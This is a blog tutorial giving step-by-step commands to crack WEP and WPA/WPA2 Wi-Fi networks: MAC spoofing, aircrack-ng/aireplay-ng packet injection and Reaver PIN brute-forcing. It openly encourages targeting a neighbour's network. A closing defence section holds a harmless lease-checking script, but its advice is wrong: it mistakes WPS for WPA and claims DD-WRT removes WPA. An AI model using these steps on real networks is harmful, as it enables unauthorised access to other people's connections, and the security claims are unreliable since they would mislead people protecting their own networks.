Tech tutorials, howtos and walkthroughs

I love the Internet and I especially love Google. Free knowledge to occupy the interstices of your free time either learning something new, watching and downloading Youtube Videos, Social Networking, designing Video Games or even making money as surmised in Digital JAM 2.0 introduces Freelancer.com and MobileWorks to Jamaica as the GOJ readies Flexi-work Legislation. And I have even more reasons to love it, as my little community of Milk River has finally been updated to the status of a place that has access to this vital Telecom Service.

Digicel has now made their WiMaX Services, commercially known as Digicel Broadband Internet, available in Milk River. That means in a few months' time, those people who bought a Digicel CPE (Customer Premises Equipment) will eventually be creating a lot of Free Wi-Fi Hot spots all around Milk River, enabling those with Mobile phones within 100 meters of your house to get essentially free Internet.

Passwords are sure to go up as quickly as a neighbor can erect a mesh-wire goat-proof fence, however, once the Network hogs in the community with their laptops sent down during the Christmas period begin to take advantage of the freeness. They’ll start to lock their Wi-Fi Networks with stronger passwords to complement the WEP (Wired Equivalent Privacy) or stronger WPA (Wi-Fi Protected Access) or WPA2 Encryption on their personal Home Wi-Fi Networks powered by either the Digicel CPE or a separate Router connected to the Digicel CPE.

These Encryption schemas are really more like zinc fences in Tivoli Garden and fall just as easily, once you’ve spent your time online wisely learning on Youtube Videos and Blogs that detail the process and less of it on Social Networks. Since this is not a tutorial on Data Encryption Schemas, I’ll not get into the technicalities, merely pausing to say WPA is more secure than WEP, but both are still hackable with only one Defense against the Dark Arts, as you’ll see below as you read.


So how does one access a WEP, WPA or WPA2 Wi-Fi Network that has a password? Folks, you know what time it is. It’s DIY (Do it Yourself) time as I distill the knowledge of the ‘Net (mainly YouTube) into one easy-to-read-and-follow Sunday Morning Project.

First you’ll need to get the following tools:

  • USB Wi-Fi Adapter capable of packet injection (ask the store tech!). The Alfa AWUS050NH USB Wi-Fi Adapter is best; buy it on Amazon.com with your Scotia VISA Debit Card. It’s for science
  • Notepad and a Pen. Yes, you’ll have to take notes
  • Desktop Computer with a CD-DVD Drive with at least 2GB RAM and 320GB Hard-Drive
  • BackTrack 5 Live CD with Reaver Software (downloaded while you hack)
  • Your own WEP or WPA/WPA2-enabled Wi-Fi Network. That’s for the Reaver Update as well as a for a crash test dummy, in case you’re not up to hacking your neighbour’s Wi-Fi Network
  • Target WEP or WPA/WPA2-enabled Wi-Fi Network. The signal should be strong with people connected and actively using the Wi-Fi Network, which increases the chances of accessing the Network. Also preferably a neighbor you don’t like
  • Patience like Job in the Old Testament section of the Bible. Most of the Steps below involve Command Line and take hours to execute. As such, your typing skills will be put to their ultimate test

If you read my article on booting a computer using a Linux Distribution from your CD-DVD Drive as described in How to boot or install Fedora Linux on your laptop or computer from a Thumb Drive, then this should be a piece of cake for you.

Now dear reader, flex your fingers, as it’s on to the fun stuff. Get ready to follow the White Rabbit to hack the WEP Wi-Fi Network:

  1. Install and connect your USB Wi-Fi Adapter
  2. Burn a bootable ISO of BackTrack 5 Live CD to a CD
  3. Boot the computer/Laptop using the bootable BackTrack 5 Live
  4. Select “BackTrack Text – Default Boot Text Mode” during boot and press Enter. This takes you to a Command Line Interface
  5. Type the command startx and press Enter. This will take you to BackTrack 5 Live GUI (Graphic User Interface)
  6. Make sure your Wi-Fi Adaptor can pick up your target Wi-Fi Network with at least three bars of solid signal
  7. Launch Konsole, BackTrack’s built-in command line located on the Taskbar in the lower left corner; it looks like a little black window in the Taskbar
  8. Type the command airmon-ng; this produces the Network Interface name of the Wi-Fi Adaptor
  9. Write down the Network Interface Name(s) that appears after running the command e.g. wh1.
  10. Use that Network Interface Name in the following commands, replacing the word <White Rabbit>.
  11. Type the command airmon-ng stop <White Rabbit>
  12. Type the command ifconfig <White Rabbit> down
  13. Type the command macchanger --mac 00:11:22:33:44:55 <White Rabbit>
  14. Type the command airmon-ng start <White Rabbit>
  15. The above four (4) commands created a fake MAC Address. Pray that it works (Fingers crossed, clutching crucifix and rosary…)
  16. Type the command airodump-ng <White Rabbit> to see a list of available Wireless Networks.
  17. When you see the name of the one you want, press Ctrl+C to stop the list
  18. Write down or copy to notepad on your computer the BSSID and its Channel in the column labeled CH. Take care to see that the Network chosen has WEP encryption as listed in the column labeled ENC
  19. Type the command airodump-ng -c [channel] -w [filename] --bssid [bssid] <White Rabbit>. Where you see [channel] and [bssid] copy the info recorded above. This command saves the ESSID Data to C: hard drive named [filename], which should be a simple filename chosen by you
  20. Open a Second Konsole window in the foreground
  21. Type the Command aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] <White Rabbit>. The ESSID is stored in the [filename] and is effectively the [filename] used in that spot in the command.
  22. Once you see the message “Association successful” with a smiley face, you’re good for the next command (Thumbs up sign!)
  23. Type the command aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 <White Rabbit>. This instructs your USB Wi-Fi Adapter to inject packets into the Network, which may result in speed slowing down on the user’s Network.
  24. Watch the #Data Column until it goes over 10,000. A walk or a nap for at least two (2) to ten (10) hours would be good right about now to stretch your legs and shake off the jitters
  25. Open a Third Konsole window in the foreground
  26. Type the Command aircrack-ng -b [bssid] [filename]-01.cap. This dumps the data to a new file named [filename]-01.cap and attempts to extract the password from the data dumped
  27. If successful in the key extraction, the WEP key appears next to “KEY FOUND:” on the Third Konsole window
  28. Write down or copy to notepad on your computer and enter it to log onto the Network. Most likely at this point, you would have shut down backtrack and booted back into Windows if the Linux Environment is not to your liking
  29. Congratulations. You’ve just hacked a WEP Wi-Fi Network

Had fun? Now let’s take Backtrack 5 Live and follow the White Rabbit to hack the WPA or a WPA2 Wi-Fi Network:

  1. Install and connect your USB Wi-Fi Adapter
  2. Burn a bootable ISO of BackTrack 5 Live CD to a CD
  3. Boot the computer/Laptop using the bootable BackTrack 5 Live
  4. Select “BackTrack Text – Default Boot Text Mode” during boot and press Enter. This takes you to a Command Line Interface
  5. Type the command startx and press Enter. This will take you to BackTrack 5 Live GUI (Graphic User Interface)
  6. Make sure your Wi-Fi adaptor can pick up your target Wi-Fi Network with at least three bars of solid signal
  7. At this point, you’ll need to have access to a Wi-Fi Network for which you have a password. This is to install Reaver, the software that will do most of the work to crack the WPA or WPA2 Wi-Fi Network
  8. Click Applications > Internet > Wicd Network Manager
  9. Select your Network and click Connect, entering password if necessary
  10. Click OK and then click Connect
  11. Click the Terminal Button in the menu bar or click Applications > Accessories > Terminal
  12. Type the Command apt-get update to Download the Reaver Update
  13. Type the Command apt-get install reaver to install after Reaver is downloaded
  14. Click Applications > Internet > Wicd Network Manager
  15. Click Disconnect. We’re now free of the Known Wi-Fi Network; time to hack the Target WPA or WPA2 Wi-Fi Network
  16. Type the Command iwconfig to get the Wi-Fi Adaptor’s Network Interface Name. Again, let’s call it <White Rabbit>
  17. Write down the Network Interface Name(s) that appears after running the command e.g. wh1.
  18. Use that Network Interface Name in the following commands, replacing the word <White Rabbit>.
  19. Type the Command airmon-ng start <White Rabbit>
  20. Type the Command airodump-ng <White Rabbit> to find the BSSID of the target WPA or WPA2 Wi-Fi Network you want to crack
  21. If the above command does not work, Type the Command airodump-ng mon0 to monitor the available WPA or WPA2 Wi-Fi Networks in the area and print a list to your screen
  22. When you see the name of the one you want, press Ctrl+C to stop the list
  23. Write down or copy to notepad on your computer the BSSID and its Moninterface. Take care to see that the Network chosen has WPA or WPA2 encryption as listed in the column labeled ENC
  24. Type the Command reaver -i [moninterface] -b [bssid] -vv, taking care to copy the BSSID and its associated Moninterface in the spots in the command labeled [bssid] and [moninterface] respectively
  25. Reaver will now brute force a series of PINs via Packet Injection to access the WPA or WPA2 Wi-Fi Networks. A walk or a nap for at least two (2) to ten (10) hours would be good right about now to stretch your legs and shake off the jitters
  26. After two (2) to ten (10) hours, according to Reaver’s documentation you should see “WPA PSK:” and the password for the WPA/WPA2 Network
  27. Write down or copy to notepad on your computer and enter it to log onto the Network. Congratulations. You’ve just hacked a WPA or WPA2 Wi-Fi Network

Based on my own research and reading online, it appears there is no known Defense Against the Dark Arts for the above WEP, WPA or WPA2 Wi-Fi Network Hack.

Here again a list helps:

  • Disabling WPA, the basis of the above hacks. However, most Wi-Fi Routers, such as those used by FLOW, do not make it possible or easy to manually disable WPA. True too for most Wi-Fi Network Routers.
  • MAC Address Filtering using a Whitelist of approved MAC Addresses. Unfortunately this can be easily defeated by an experienced hacker getting the MAC Address of the target Computer of the Network connected to the Wi-Fi Router via various means and then spoofing that MAC Address.

The only thing that works, ironically, is upgrading your Wi-Fi Router to Open Source (woot woot!) Wi-Fi Router firmware DD-WRT. This as DD-WRT does not support the IEEE standard WPA as it’s Open Source Firmware and maintained by the Open Source Community worried about the very same vulnerability in Wi-Fi Networks.

However, before you go and update your Wi-Fi Router’s Firmware with DD-WRT, you’ll have to check (i.e. Google) to see if your Wi-Fi Router supports what is currently the only Defense against the Dark Arts when it comes to Wi-Fi Network Hacking.

Finally too, there’s also just simply using Social Engineering Methods. Here are a few, courtesy of the White Rabbit:

  • Setting up a Website Whitelist Filter using Freeware K9 Web Protect Website Filter. Hackers usually like to use other Wi-Fi Networks to download movies and large content. K9 Web Protect will create a list of Websites that are not only safe for the family, but prevent access by hackers once they hack your Wi-Fi Network.
  • Monitor your Wi-Fi Network’s Traffic using Networx, a freeware Network Monitor. Networx can be set to track your Internet usage and alert you of suspicious traffic on your Wi-Fi Network.
  • Change the password once each week, frustrating the Hacker, who spent hours hacking you the first time and now has to sit through another 2 to 10 hours, or move on to another victim.
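If you want something a little more DIY than Networx for the “who is on my Wi-Fi?” check, here is a small script I’m adding to this post (it is not from Networx, K9 or DD-WRT). It assumes your Router keeps its DHCP leases in the dnsmasq lease-file format that DD-WRT-style firmware writes (one lease per line: expiry, MAC, IP, hostname, client-id); the lease lines and the allow-list are made-up sample data standing in for your own Router and devices.

```python
"""Flag Wi-Fi clients whose MAC Address is not on your approved list.

Assumes the dnsmasq lease-file layout used by DD-WRT-style Routers:
"<expiry-epoch> <mac> <ip> <hostname> <client-id>", one lease per line.
"""
import re

# Constructed sample data: three leases as a Router might record them.
# Replace with the contents of your Router's lease file.
SAMPLE_LEASES = """\
1700000000 a4:5e:60:11:22:33 192.168.1.10 family-laptop 01:a4:5e:60:11:22:33
1700000300 3c:22:fb:aa:bb:cc 192.168.1.11 kitchen-phone *
1700000600 00:11:22:33:44:55 192.168.1.12 * *
"""

# Constructed allow-list: the MAC Addresses of the devices you own.
ALLOWED_MACS = {"a4:5e:60:11:22:33", "3c:22:fb:aa:bb:cc"}

MAC_RE = re.compile(r"^[0-9a-f]{2}(:[0-9a-f]{2}){5}$")


def parse_leases(text):
    """Return (mac, ip, hostname) for every well-formed lease line."""
    leases = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # blank or truncated line, ignore it
        mac = parts[1].lower()
        if not MAC_RE.match(mac):
            continue  # second field is not a MAC Address, ignore it
        leases.append((mac, parts[2], parts[3]))
    return leases


def unknown_clients(text, allowed):
    """Leases whose MAC is not on the allow-list.

    Same caveat as MAC Address Filtering itself: a device that spoofs
    one of your approved MAC Addresses will not show up here.
    """
    allowed = {m.lower() for m in allowed}
    return [lease for lease in parse_leases(text) if lease[0] not in allowed]


if __name__ == "__main__":
    for mac, ip, host in unknown_clients(SAMPLE_LEASES, ALLOWED_MACS):
        print(f"ALERT: unknown client {mac} at {ip} (hostname {host})")
```

Run it from a scheduled task against a copy of the Router’s lease file and you get the weekly “who is on my Network” check without installing anything on the Router itself.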

That’s it folks. Remember Knowledge is Power. Use it wisely…..

Here are the links:

BackTrack 5 Live CD

http://www.backtrack-linux.org/downloads/

Networx 5.2.5

http://www.softpedia.com/get/Network-Tools/Bandwidth-Tools/Networx.shtml

K9 Web Protect

http://www1.k9webprotection.com/

DD-WRT Firmware

http://dd-wrt.com/
